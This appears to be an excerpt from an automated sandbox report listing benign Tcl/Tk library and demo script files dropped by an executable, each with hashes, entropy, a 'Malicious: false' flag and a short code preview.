SHA-256:	1C4AB4BBBD9C37B6F4696917030AD13BBB14CD4502FF81AD211157D8BCE6C29A
SHA-512:	DE7A7BC99644B8AD5FB89F4FBEAE648951AA6EDB213CA8D2CFFA8D6EADA2D194C6996DA120536B915020D2A5E4921E08E7D05A478A18DB1A0283ECAC26D56954
Malicious:	false
Preview:	# clrpick.tcl --.#.#.Color selection dialog for platforms that do not support a.#.standard color selection dialog..#.# Copyright (c) 1996 Sun Microsystems, Inc..#.# See the file "license.terms" for information on usage and redistribution.# of this file, and for a DISCLAIMER OF ALL WARRANTIES..#.# ToDo:.#.#.(1): Find out how many free colors are left in the colormap and.#. don't allocate too many colors..#.(2): Implement HSV color selection. .#..# Make sure namespaces exist.namespace eval ::tk {}.namespace eval ::tk::dialog {}.namespace eval ::tk::dialog::color {. namespace import ::tk::msgcat::*.}..# ::tk::dialog::color:: --.#.#.Create a color dialog and let the user choose a color. This function.#.should not be called directly. It is called by the tk_chooseColor.#.function when a native color selector widget does not exist.#.proc ::tk::dialog::color:: {args} {. variable ::tk::Priv. set dataName __tk__color. upvar ::tk::dialog::color::$dataName data. set w .$dataName

C:\Users\user\Desktop\tk\comdlg.tcl Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	7726
Entropy (8bit):	5.004404304157801
Encrypted:	false
SSDEEP:	192:Aq7APy5HEO9KY8QHyWpLWNRYG50aGAZbQWlO+W0WvHv/3WvWHLV7LKpTTk:Aq7A6HJ9K+yWpaNRYuVDST1rvveuHZLT
MD5:	2E0793510BA032CBE424A716CF00A8F0
SHA1:	DCE9925FF6FCA2CB34D9FAC0280E97924DE885A7
SHA-256:	2591BBD2BC87D8F551A12D5F7F3F3EF21F070244E5EBA62E09DB003787F91790
SHA-512:	4D81B1E9569650C85978045AD5AAC78EF37A986F1DC21A5A10E7544B1D2269184A5571D8F6C0CA9D61CA2C78B94BA7100B3ACC46F89520A1829A87533B29FA03
Malicious:	false
Preview:	# comdlg.tcl --.#.#.Some functions needed for the common dialog boxes. Probably need to go.#.in a different file..#.# Copyright (c) 1996 Sun Microsystems, Inc..#.# See the file "license.terms" for information on usage and redistribution.# of this file, and for a DISCLAIMER OF ALL WARRANTIES..#..# tclParseConfigSpec --.#.#.Parses a list of "-option value" pairs. If all options and.#.values are legal, the values are stored in.#.$data($option). Otherwise an error message is returned. When.#.an error happens, the data() array may have been partially.#.modified, but all the modified members of the data(0 array are.#.guaranteed to have valid values. This is different than.#.Tk_ConfigureWidget() which does not modify the value of a.#.widget record if any error occurs..#.# Arguments:.#.# w = widget record to modify. Must be the pathname of a widget..#.# specs = {.# {-commandlineswitch resourceName ResourceClass defaultValue verifier}.# {....}.# }.#.# flags = currently unused..#.# argList

C:\Users\user\Desktop\tk\console.tcl Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	29634
Entropy (8bit):	4.917740343704056
Encrypted:	false
SSDEEP:	384:eWptONWz4xOtyU/W1ZQWiVEwYGl7nS5r+KtuQlLW4qvRHTrStCO2FfB2vW3cwcZL:eWp0NWz4niTeG6r+K4YE6GMWFOYoV
MD5:	3F162B54E4981151C12FE7ABC899D754
SHA1:	C668D83FB92246714B9296303B14772BE4406C24
SHA-256:	0C4F8AFDF412C3A23BE4C87BC597A32E98995E4957841021FBA34D0938B49F60
SHA-512:	84FB3295EF2907A26E968553F8B65F4FE38E9C11D0A303CFF3F7477E474E397FA6319013ED7174D0057D5D4C8127D5A73BFFD56D32D085F258A7689795AC4396
Malicious:	false
Preview:	# console.tcl --.#.# This code constructs the console window for an application. It.# can be used by non-unix systems that do not have built-in support.# for shells..#.# Copyright (c) 1995-1997 Sun Microsystems, Inc..# Copyright (c) 1998-2000 Ajuba Solutions..# Copyright (c) 2007 Daniel A. Steffen <das@users.sourceforge.net>.#.# See the file "license.terms" for information on usage and redistribution.# of this file, and for a DISCLAIMER OF ALL WARRANTIES..#..# TODO: history - remember partially written command..namespace eval ::tk::console {. variable blinkTime 500 ; # msecs to blink braced range for. variable blinkRange 1 ; # enable blinking of the entire braced range. variable magicKeys 1 ; # enable brace matching and proc/var recognition. variable maxLines 600 ; # maximum # of lines buffered in console. variable showMatches 1 ; # show multiple expand matches.. variable inPlugin [info exists embed_args]. variable defaultPrompt ; # default prompt

C:\Users\user\Desktop\tk\demos\README Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	2082
Entropy (8bit):	4.543998600726884
Encrypted:	false
SSDEEP:	48:XuSMr3iuWyBoQYrRWO9wSpWeES8+6m3FzjanJ87d:XvMrvJOpW0MeV8+6Wpjo85
MD5:	409F1ECBE893F3BA0972A248FB639D18
SHA1:	34414BF5979B9D6ED44395A5DB8C44F5D61F38E0
SHA-256:	759D77D3A4BC6BE4A310327FDE118A554C039803CEFEB51709DB92CBF1722C7B
SHA-512:	6F9D0E61B894CC0965D19DD1849B8FB93472CA65A6C6FCAC06E42E82636F6C43FABD70AA2B8C4251C711AD4CAD083F8084E0410BAA7753FD8AFAEFC7D5F659E2
Malicious:	false
Preview:	This directory contains a collection of programs to demonstrate.the features of the Tk toolkit. The programs are all scripts for."wish", a windowing shell. If wish has been installed on your path.then you can invoke any of the programs in this directory just.by typing its file name to your command shell under Unix. Otherwise.invoke wish with the file as its first argument, e.g., "wish hello"..The rest of this file contains a brief description of each program..Files with names ending in ".tcl" are procedure packages used by one.or more of the demo programs; they can't be used as programs by.themselves so they aren't described below...hello -..Creates a single button; if you click on it, a message...is typed and the application terminates...widget -.Contains a collection of demonstrations of the widgets...currently available in the Tk library. Most of the .tcl...files are scripts for individual demos available through...the "widget" program...ixset -..A simple Tk-based wrapper for

C:\Users\user\Desktop\tk\demos\anilabel.tcl Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	6670
Entropy (8bit):	5.376257934071164
Encrypted:	false
SSDEEP:	96:WOd3V1YNO2cTLS6ulLjZrQ1fBST5ME8Sr2X2wkh5HSD5ks3M/LTTbNXzmCq6kO:WOd3LYA2cvzulJcp4KvSo2UovPBSeJ
MD5:	3D8C2B6112E05C977CCCDBB5CEB959E6
SHA1:	B6CD96707A4242D1908D9B85424DD824784078A1
SHA-256:	938D2A37988AC5B44D530355FEECF1935A27E2E20DE7D72FD5792E6DB4DB6A18
SHA-512:	7C0332681418A1BD0CC1F4C131DC65CF003173CF3199C18B2613A2113DA46A020ABB365A96C5A57F319C4C1E8E7F512CE64E6CFBBF21E675F721D736C093D309
Malicious:	false
Preview:	# anilabel.tcl --.#.# This demonstration script creates a toplevel window containing.# several animated label widgets...if {![info exists widgetDemo]} {. error "This script should be run from the \"widget\" demo.".}..package require Tk..set w .anilabel.catch {destroy $w}.toplevel $w.wm title $w "Animated Label Demonstration".wm iconname $w "anilabel".positionWindow $w..label $w.msg -font $font -wraplength 4i -justify left -text "Four animated labels are displayed below; each of the labels on the left is animated by making the text message inside it appear to scroll, and the label on the right is animated by animating the image that it displays.".pack $w.msg -side top..## See Code / Dismiss buttons.set btns [addSeeDismiss $w.buttons $w].pack $btns -side bottom -fill x..# Ensure that this this is an array.array set animationCallbacks {}..## This callback is the core of how to do animation in Tcl/Tk; all.## animations work in basically the same way, with a procedure that.## uses the [a

C:\Users\user\Desktop\tk\demos\aniwave.tcl Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	3495
Entropy (8bit):	4.711248037189139
Encrypted:	false
SSDEEP:	96:i1OQ4T0NwZGDGM1udcmdyRG+5NNLaPkWt4EQMPdr2gh07:oOQ4QNoGDH1fmWpVLWkWtIMPdrZh07
MD5:	013C7D29A1E1DF44047F685F32FE77A9
SHA1:	D5AE5D9100357EAAA6278B9104532C83CB994157
SHA-256:	FC7A5978B3F2B0F88412216379B8ABFF684C8AB6893DDF4AEC954AD8DEBFD1FA
SHA-512:	C030E7A9AC5EA8C6CB2FEE3B8D7A9DD8635C2DEDF9A4D13A6C51E55EE3FB6ABC634298A7ECD56C93ABBD8CEE361A1BAB754811AED300BA7B65E1DD6A4F4CAA45
Malicious:	false
Preview:	# aniwave.tcl --.#.# This demonstration script illustrates how to adjust canvas item.# coordinates in a way that does something fairly similar to waveform.# display...if {![info exists widgetDemo]} {. error "This script should be run from the \"widget\" demo.".}..package require Tk..set w .aniwave.catch {destroy $w}.toplevel $w.wm title $w "Animated Wave Demonstration".wm iconname $w "aniwave".positionWindow $w..label $w.msg -font $font -wraplength 4i -justify left -text "This demonstration contains a canvas widget with a line item inside it. The animation routines work by adjusting the coordinates list of the line; a trace on a variable is used so updates to the variable result in a change of position of the line." .pack $w.msg -side top..## See Code / Dismiss buttons.set btns [addSeeDismiss $w.buttons $w].pack $btns -side bottom -fill x..# Create a canvas large enough to hold the wave. In fact, the wave.# sticks off both sides of the canvas to prevent visual glitches..pack [canvas

C:\Users\user\Desktop\tk\demos\arrow.tcl Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	7984
Entropy (8bit):	5.005554132118184
Encrypted:	false
SSDEEP:	192:mOWje2zcDOsWz7rgMQlTv7aP4rXXO6e6RX666JP0/flfcXnHqzoXpq:mHeSgZJXXO6e6RX666JPE2ez
MD5:	5F6D07307178177B75A4F09716EEA118
SHA1:	DA3A38F6F90275E2B2D4D1AF9DEA51D52CC72197
SHA-256:	3E224D8E0F5EDFCC33E8457A49DE4AEB719DFA4EA62472E4AF86CCD7EEED7227
SHA-512:	EFE0BC7994E77DD92B8313B2B8DDCDFD4947C81BA58ECEDCCF46C4DB4172570BE7715C0A86521C05BF4EFCC050750E26430C8E99C942B68453793D718BDA3791
Malicious:	false
Preview:	# arrow.tcl --.#.# This demonstration script creates a canvas widget that displays a.# large line with an arrowhead whose shape can be edited interactively...if {![info exists widgetDemo]} {. error "This script should be run from the \"widget\" demo.".}..package require Tk..# arrowSetup --.# This procedure regenerates all the text and graphics in the canvas.# window. It's called when the canvas is initially created, and also.# whenever any of the parameters of the arrow head are changed.# interactively..#.# Arguments:.# c -..Name of the canvas widget...proc arrowSetup c {. upvar #0 demo_arrowInfo v.. # Remember the current box, if there is one... set tags [$c gettags current]. if {$tags != ""} {..set cur [lindex $tags [lsearch -glob $tags box?]]. } else {..set cur "". }.. # Create the arrow and outline... $c delete all. eval {$c create line $v(x1) $v(y) $v(x2) $v(y) -arrow last \.. -width [expr {10$v(width)}] -arrowshape [list \.. [expr {10$v(a)}

C:\Users\user\Desktop\tk\demos\bind.tcl Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	2943
Entropy (8bit):	4.76405661095109
Encrypted:	false
SSDEEP:	48:gvRXe588WzRiDRcDRfaQmBHxBKJWVd9iqkE1gtSrm12deHzkH08HJHfH6HuegcPz:6OilzRucd8EkL9izSgL12SQH08HJHfHg
MD5:	4307BDE8E2BB7246F6BAF80EC1DB23C7
SHA1:	5AAD3A7BFA0395560735619E838540765741E5BB
SHA-256:	2EF60795C52D9424531F5157A2854E579634A7FAC5EF4202CCF0A64E3C2A3A95
SHA-512:	DFD04D994DF68B035C1E11841BF98AEF1D686E0305541166FA39BED5D943B28574FF8F6BBB78E247EEEBDB59474E9519979A269E6CF2880B0ED1A2D1FAAD2A14
Malicious:	false
Preview:	# bind.tcl --.#.# This demonstration script creates a text widget with bindings set.# up for hypertext-like effects...if {![info exists widgetDemo]} {. error "This script should be run from the \"widget\" demo.".}..package require Tk..set w .bind.catch {destroy $w}.toplevel $w.wm title $w "Text Demonstration - Tag Bindings".wm iconname $w "bind".positionWindow $w..## See Code / Dismiss buttons.set btns [addSeeDismiss $w.buttons $w].pack $btns -side bottom -fill x..text $w.text -yscrollcommand "$w.scroll set" -setgrid true \..-width 60 -height 24 -font $font -wrap word.scrollbar $w.scroll -command "$w.text yview".pack $w.scroll -side right -fill y.pack $w.text -expand yes -fill both..# Set up display styles...if {[winfo depth $w] > 1} {. set bold "-background #43ce80 -relief raised -borderwidth 1". set normal "-background {} -relief flat".} else {. set bold "-foreground white -background black". set normal "-foreground {} -background {}".}..# Add text to widget...$w.text

C:\Users\user\Desktop\tk\demos\bitmap.tcl Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	1411
Entropy (8bit):	4.769189578381273
Encrypted:	false
SSDEEP:	24:w14IryqXeVXeE6X2yvPbGlcBNwVKA/PjUCt1KxzyhzgQT1p8HpIYZHD9:YZryqXen6G2BNqKoPjUK86gQTUHmyD9
MD5:	39DD76CFBAD94B253E4625CF07DC6EC0
SHA1:	1D36E70DEC67FC89A9F77F21CBA2D784BFA79004
SHA-256:	E9B74C16AC87ED4BE29AF6D8411C5303FACCF3785C37E39441D30AA72798D8C3
SHA-512:	11D5D3C7DB7482D9BE7E29919C62A95BC2C6805106B88C26AA473C340BC330A1E41B760A304628442E239D74F6EF1EFD7AF7B09F49274E80D01FC9ED3EEE9B37
Malicious:	false
Preview:	# bitmap.tcl --.#.# This demonstration script creates a toplevel window that displays.# all of Tk's built-in bitmaps...if {![info exists widgetDemo]} {. error "This script should be run from the \"widget\" demo.".}..package require Tk..# bitmapRow --.# Create a row of bitmap items in a window..#.# Arguments:.# w -..The window that is to contain the row..# args -.The names of one or more bitmaps, which will be displayed.#..in a new row across the bottom of w along with their.#..names...proc bitmapRow {w args} {. frame $w. pack $w -side top -fill both. set i 0. foreach bitmap $args {..frame $w.$i..pack $w.$i -side left -fill both -pady .25c -padx .25c..label $w.$i.bitmap -bitmap $bitmap..label $w.$i.label -text $bitmap -width 9..pack $w.$i.label $w.$i.bitmap -side bottom..incr i. }.}..set w .bitmap.catch {destroy $w}.toplevel $w.wm title $w "Bitmap Demonstration".wm iconname $w "bitmap".positionWindow $w..label $w.msg -font $font -wraplength 4i -justify left -text "This

C:\Users\user\Desktop\tk\demos\browse Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	1755
Entropy (8bit):	4.777424721801473
Encrypted:	false
SSDEEP:	48:MlCY/5o/xNgUMuE8/G8Ud2vSGO0QkWBW8wQlnI5DSXqo1R:cjxoYUxVv7O0VWBWFQR+Sao/
MD5:	356E667B0A60A81DF28B1F12476CCF4D
SHA1:	615B47C95E5EE597E10042E9F6AD24993DCB13E1
SHA-256:	24925E74443749B331E84CB5ACF968576F4C033290F955B03DDB38A034B50441
SHA-512:	33F86299707337154C6E6442650D78DC2640DD57BCBD6504ED7936F4A2005DF1D25B4A2ECC162334B9A88CDD787EA6273701DF3FD95A0DFB5BD44F9009C4664D
Malicious:	false
Preview:	#!/bin/sh.# the next line restarts using wish \.exec wish "$0" ${1+"$@"}..# browse --.# This script generates a directory browser, which lists the working.# directory and allows you to open files or subdirectories by.# double-clicking...package require Tk..# Create a scrollbar on the right side of the main window and a listbox.# on the left side...scrollbar .scroll -command ".list yview".pack .scroll -side right -fill y.listbox .list -yscroll ".scroll set" -relief sunken -width 20 -height 20 \..-setgrid yes.pack .list -side left -fill both -expand yes.wm minsize . 1 1..# The procedure below is invoked to open a browser on a given file; if the.# file is a directory then another instance of this program is invoked; if.# the file is a regular file then the Mx editor is invoked to display.# the file...set browseScript [file join [pwd] $argv0].proc browse {dir file} {. global env browseScript. if {[string compare $dir "."] != 0} {set file $dir/$file}. switch [file type $file] {..d

C:\Users\user\Desktop\tk\demos\button.tcl Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	1504
Entropy (8bit):	4.817419290133317
Encrypted:	false
SSDEEP:	24:t14I1XeVXen1KMhzV7pEfuIlaRMsT1poCxJsYiMTKf0RgzRJRfKgRg0:TZ1Xea8652fuPtTTfsPMTr6z/8gO0
MD5:	BA205C1387EDE875CE2BEB6FBFABD566
SHA1:	F0403C482353914CD861B10367EEA8EE12292943
SHA-256:	F48F7F11D71BF560FD64082D6B803C4D88288861DD41853A27A5AF3F19F51D23
SHA-512:	C3306232A8E282DBD59CF2AD6E90B66608B94FC82A2F6A4658C9CB14ED0B5D82AABF713135BE858EE9430C7319B49B75061D520541413C2A349BA0D58F33A7E0
Malicious:	false
Preview:	# button.tcl --.#.# This demonstration script creates a toplevel window containing.# several button widgets...if {![info exists widgetDemo]} {. error "This script should be run from the \"widget\" demo.".}..package require Tk..set w .button.catch {destroy $w}.toplevel $w.wm title $w "Button Demonstration".wm iconname $w "button".positionWindow $w..label $w.msg -font $font -wraplength 4i -justify left -text "If you click on any of the four buttons below, the background of the button area will change to the color indicated in the button. You can press Tab to move among the buttons, then press Space to invoke the current button.".pack $w.msg -side top..## See Code / Dismiss buttons.pack [addSeeDismiss $w.buttons $w] -side bottom -fill x..proc colorrefresh {w col} {. $w configure -bg $col. if {[tk windowingsystem] eq "aqua"} {..# set highlightbackground of all buttons in $w..set l [list $w]..while {[llength $l]} {.. set l [concat [lassign $l b] [winfo children $b]].. if {[w

C:\Users\user\Desktop\tk\demos\check.tcl Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	2278
Entropy (8bit):	4.711710064151669
Encrypted:	false
SSDEEP:	48:48ZpXeI8ia2akd4MwdTag5RHg1CQkih6rgiogx1ctcIoonxOhUTpUcUvI:4kO/PzMeTaIeGih6rgirxaywx0OXAI
MD5:	432627E1DC6707FD439D4083FCCD49D5
SHA1:	266FB3FBCB90ECBA361E2BDC8B9792C79A42F46B
SHA-256:	6C7BFCF02B7AF72116C3E58EDFFA771AC83A4A0671A71A96266BC9646845AC96
SHA-512:	819FBAE9793EB06F216693E504DF0220E911F95B521868E2710A7CD8A498CF7B69260653AE7BA1BDF5B709ABDD17A68432CB1115A4491EBE2061780176F1D05C
Malicious:	false
Preview:	# check.tcl --.#.# This demonstration script creates a toplevel window containing.# several checkbuttons...if {![info exists widgetDemo]} {. error "This script should be run from the \"widget\" demo.".}..package require Tk..set w .check.catch {destroy $w}.toplevel $w.wm title $w "Checkbutton Demonstration".wm iconname $w "check".positionWindow $w..label $w.msg -font $font -wraplength 4i -justify left -text "Four checkbuttons are displayed below. If you click on a button, it will toggle the button's selection state and set a Tcl variable to a value indicating the state of the checkbutton. The first button also follows the state of the other three. If only some of the three are checked, the first button will display the tri-state mode. Click the \"See Variables\" button to see the current values of the variables.".pack $w.msg -side top..## See Code / Dismiss buttons.set btns [addSeeDismiss $w.buttons $w [list safety wipers brakes sober]].pack $btns -side bottom -fill x..checkbutton

C:\Users\user\Desktop\tk\demos\clrpick.tcl Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	1431
Entropy (8bit):	4.6629587381815965
Encrypted:	false
SSDEEP:	24:6SitXeVXex1KAhz+NMT1p+sIJ5OqdpIiVSaluMyb0abps5sd90aB:6ZtXe682yMT2FH2M1fyb0Y0K90C
MD5:	BA74398EC9FE9B0755AA5197AF597AB9
SHA1:	B9C46B4F1515A51A4359FFFAA254586D8DE36DCE
SHA-256:	E2DD2648DB7E0EDDA8A4E64ED4BB24498371B9FA81B3D0886A84A4B7CC6B8052
SHA-512:	E5F353165110006A572AC8E2F9981D0CB8076F334741D622CB2F0A6AD99DBED50A80A9286D50C94CF7CCA87AFB386020753C3595319E3A31F4C7CC40FD63EB69
Malicious:	false
Preview:	# clrpick.tcl --.#.# This demonstration script prompts the user to select a color...if {![info exists widgetDemo]} {. error "This script should be run from the \"widget\" demo.".}..package require Tk..set w .clrpick.catch {destroy $w}.toplevel $w.wm title $w "Color Selection Dialog".wm iconname $w "colors".positionWindow $w..label $w.msg -font $font -wraplength 4i -justify left -text "Press the buttons below to choose the foreground and background colors for the widgets in this window.".pack $w.msg -side top..## See Code / Dismiss buttons.set btns [addSeeDismiss $w.buttons $w].pack $btns -side bottom -fill x..button $w.back -text "Set background color ..." \. -command \. "setColor $w $w.back background {-background -highlightbackground}".button $w.fore -text "Set foreground color ..." \. -command \. "setColor $w $w.back foreground -foreground"..pack $w.back $w.fore -side top -anchor c -pady 2m..proc setColor {w button name options} {. grab $w. set initialColor [$bu

C:\Users\user\Desktop\tk\demos\colors.tcl Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	4995
Entropy (8bit):	4.941604042860813
Encrypted:	false
SSDEEP:	96:RFCOt2t2vTUoGOp9WT0suQ9/jbT7Qcy2ti1Rnf7IyEgqfB:RYOt2M/GO6jbT7Qc+Dux
MD5:	E3AA52954BA501E7C3C376CD564BA696
SHA1:	F0402C4AB5452E261D18EDA186C03680666B861C
SHA-256:	2E0B8592862B0C3754012DB957DFEDF5247CAF5F0DF7495384FC264B69DB8216
SHA-512:	65C02A92390FD2E5816DB60B16CEF9FA83A44A4C52928D18973BEB184C43E9698795C9B2E6E9DBC40102C23A8CAF6E8DE54FF1004BD6B84F43C2954591760179
Malicious:	false
Preview:	# colors.tcl --.#.# This demonstration script creates a listbox widget that displays.# many of the colors from the X color database. You can click on.# a color to change the application's palette...if {![info exists widgetDemo]} {. error "This script should be run from the \"widget\" demo.".}..package require Tk..set w .colors.catch {destroy $w}.toplevel $w.wm title $w "Listbox Demonstration (colors)".wm iconname $w "Listbox".positionWindow $w..label $w.msg -font $font -wraplength 4i -justify left -text "A listbox containing several color names is displayed below, along with a scrollbar. You can scan the list either using the scrollbar or by dragging in the listbox window with button 2 pressed. If you double-click button 1 on a color, then the application's color palette will be set to match that color".pack $w.msg -side top..## See Code / Dismiss buttons.set btns [addSeeDismiss $w.buttons $w].pack $btns -side bottom -fill x..frame $w.frame -borderwidth 10.pack $w.frame -side top

C:\Users\user\Desktop\tk\demos\combo.tcl Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	1983
Entropy (8bit):	4.940704587445227
Encrypted:	false
SSDEEP:	48:11xXeGW48Ta3lzIC0nnhCCQ7WS4D5j8UijN:xOVvTnnhSW7DR8tN
MD5:	71ED64C32C9C043E53025079EB299A68
SHA1:	CEDFA0A931B878F84176F1C0C62B417FD14524F1
SHA-256:	F51985733A5FA75133C947B820BED0ABF727CBA9EF06588A05BCED1751EF2281
SHA-512:	6CCDE87DA4F80390FF706BBE6E9DBC202E231165EC946693E84292CAE970D6FDCE5C72881B1A05ED12555F9A999FCEFD0C4261E65B187188C16EF18A6A450CAD
Malicious:	false
Preview:	# combo.tcl --.#.# This demonstration script creates several combobox widgets...if {![info exists widgetDemo]} {. error "This script should be run from the \"widget\" demo.".}..package require Tk.package require Ttk..set w .combo.catch {destroy $w}.toplevel $w.wm title $w "Combobox Demonstration".wm iconname $w "combo".positionWindow $w..ttk::label $w.msg -font $font -wraplength 5i -justify left -text "Three different\..combo-boxes are displayed below. You can add characters to the first\..one by pointing, clicking and typing, just as with an entry; pressing\..Return will cause the current value to be added to the list that is\..selectable from the drop-down list, and you can choose other values\..by pressing the Down key, using the arrow keys to pick another one,\..and pressing Return again. The second combo-box is fixed to a\..particular value, and cannot be modified at all. The third one only\..allows you to select values from its drop-down list of Australian\..cities.".pack $w.m

C:\Users\user\Desktop\tk\demos\cscroll.tcl Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	3389
Entropy (8bit):	4.868629590282126
Encrypted:	false
SSDEEP:	96:h3OzzUuzjTUtqFpF/HMA9YutMazeonVD5Y10tMK2Ibl10tM5Vr1PMsB:h3OzzUunIqFpFjtMazeonVD5Y10tMC1D
MD5:	EC84273FEDB17B5675D72BCBC0A02255
SHA1:	95B3487EDAB4FA47575C303270646DB91AF13B92
SHA-256:	BA7AAE6CE234DD3EC087D155DEB30CE86BEBC9CD30BEBAEE1F5E16352877CDC4
SHA-512:	4B874C7859E4522B79B3D8252204B4B03293D4E0419B16E412EB90A25A5575CE7397866C88D9376D9AFBCA05584BE5F6198585673DC0337D622DDF328A5F272F
Malicious:	false
Preview:	# cscroll.tcl --.#.# This demonstration script creates a simple canvas that can be.# scrolled in two dimensions...if {![info exists widgetDemo]} {. error "This script should be run from the \"widget\" demo.".}..package require Tk..set w .cscroll.catch {destroy $w}.toplevel $w.wm title $w "Scrollable Canvas Demonstration".wm iconname $w "cscroll".positionWindow $w.set c $w.c..label $w.msg -font $font -wraplength 4i -justify left -text "This window displays a canvas widget that can be scrolled either using the scrollbars or by dragging with button 2 in the canvas. If you click button 1 on one of the rectangles, its indices will be printed on stdout.".pack $w.msg -side top..## See Code / Dismiss buttons.set btns [addSeeDismiss $w.buttons $w].pack $btns -side bottom -fill x..frame $w.grid.scrollbar $w.hscroll -orient horiz -command "$c xview".scrollbar $w.vscroll -command "$c yview".canvas $c -relief sunken -borderwidth 2 -scrollregion {-11c -11c 50c 20c} \..-xscrollcommand "$w.hscroll

C:\Users\user\Desktop\tk\demos\ctext.tcl Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	4870
Entropy (8bit):	4.851101742889436
Encrypted:	false
SSDEEP:	96:CgOxhCQ/Tc2S5TUwPybVsmN07Bj9k9n9Dblj9pQ9Li2BJ8syhhY:CgOxcQ7BS5YwPyumN07Bj9k9n9DbljjS
MD5:	0BCAC0F6426B7797DE8852AD312D769E
SHA1:	F7BAFC03780A6744E696F638E685CC6348CD7AB5
SHA-256:	4116E352F4B8D90EF7B60E3E460EE5F4F45FA0FC7942C54FAC621997EA1A672D
SHA-512:	00CEC6E379C6DD168C5FC6E603DFF50B6365A234FE4111E5D275C9E03621E625FA49363C1D777719179CE2562BDD68FD21263DEA6D7F5013832648F0A99DC7B9
Malicious:	false
Preview:	# ctext.tcl --.#.# This demonstration script creates a canvas widget with a text.# item that can be edited and reconfigured in various ways...if {![info exists widgetDemo]} {. error "This script should be run from the \"widget\" demo.".}..package require Tk..set w .ctext.catch {destroy $w}.toplevel $w.wm title $w "Canvas Text Demonstration".wm iconname $w "Text".positionWindow $w.set c $w.c..label $w.msg -font $font -wraplength 5i -justify left -text "This window displays a string of text to demonstrate the text facilities of canvas widgets. You can click in the boxes to adjust the position of the text relative to its positioning point or change its justification. The text also supports the following simple bindings for editing:. 1. You can point, click, and type.. 2. You can also select with button 1.. 3. You can copy the selection to the mouse position with button 2.. 4. Backspace and Control+h delete the selection if there is one;. otherwise they delete the character ju

C:\Users\user\Desktop\tk\demos\dialog1.tcl Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	660
Entropy (8bit):	4.6411810814717285
Encrypted:	false
SSDEEP:	12:4FabQERbpIx8yJyWD6TrCS3PBzbaSxI0sUbbb0mK:414bpIyaH6Pv/BzzxI0Nbbb0l
MD5:	838A6E5A40CAEA4AED19EBC83E3C8DB0
SHA1:	8FDA0AAD0E6CFB08F11C780B3558215388A2FBAE
SHA-256:	ADA9B91DBE9859EAF01009EEC6159DEF9508299E25B8625D574B1E607D72DE9D
SHA-512:	4F35AB4323DB42AB25547CF1882D7149B02ED1FB96863D2EF7DCCD3DBF1AB05E1015AE8EB8675841C08BB0D0586CED1A207C8B47874870059451CA13A93F283F
Malicious:	false
Preview:	# dialog1.tcl --.#.# This demonstration script creates a dialog box with a local grab...after idle {.dialog1.msg configure -wraplength 4i}.set i [tk_dialog .dialog1 "Dialog with local grab" {This is a modal dialog box. It uses Tk's "grab" command to create a "local grab" on the dialog box. The grab prevents any pointer-related events from getting to any other windows in the application until you have answered the dialog by invoking one of the buttons below. However, you can still interact with other applications.} \.info 0 OK Cancel {Show Code}]..switch $i {. 0 {puts "You pressed OK"}. 1 {puts "You pressed Cancel"}. 2 {showCode .dialog1}.}.

C:\Users\user\Desktop\tk\demos\dialog2.tcl Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	613
Entropy (8bit):	4.653407262172826
Encrypted:	false
SSDEEP:	12:zFabQERb9Lv/FMPwk+A5YFiA3JWBBmaWGDFofAnoMsUbbb0mp:z14bN9MIk+JD3JwBm22fAJNbbb0m
MD5:	321E9355F15F0AEC3A96D88AC649EB2A
SHA1:	01EEEED54F79DA743C8EB8EF2AB729B282EFEC28
SHA-256:	B3A9D5531B93524E05041035DC43847968D0F1E20E0C0B0593522F50ACD28E60
SHA-512:	1A2CFAC70182F01F37B74FFA92FC4C490B87E07495A0071B1EBDDB220E9B63DD37635F03EB72B7B52EADE11E5845CFD95CEB8C9111D0394FB6EDB6F9639C4521
Malicious:	false
Preview:	# dialog2.tcl --.#.# This demonstration script creates a dialog box with a global grab...after idle {. .dialog2.msg configure -wraplength 4i.}.after 100 {. grab -global .dialog2.}.set i [tk_dialog .dialog2 "Dialog with global grab" {This dialog box uses a global grab, so it prevents you from interacting with anything on your display until you invoke one of the buttons below. Global grabs are almost always a bad idea; don't use them unless you're truly desperate.} warning 0 OK Cancel {Show Code}]..switch $i {. 0 {puts "You pressed OK"}. 1 {puts "You pressed Cancel"}. 2 {showCode .dialog2}.}.

C:\Users\user\Desktop\tk\demos\en.msg Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	3890
Entropy (8bit):	4.592361397598168
Encrypted:	false
SSDEEP:	48:RBM53MSplFy+0yD5BZvP8Es0ULBZn/ZSHc/DX:Y58Sp/y+0yDTZH8EsNLBZn/ZesDX
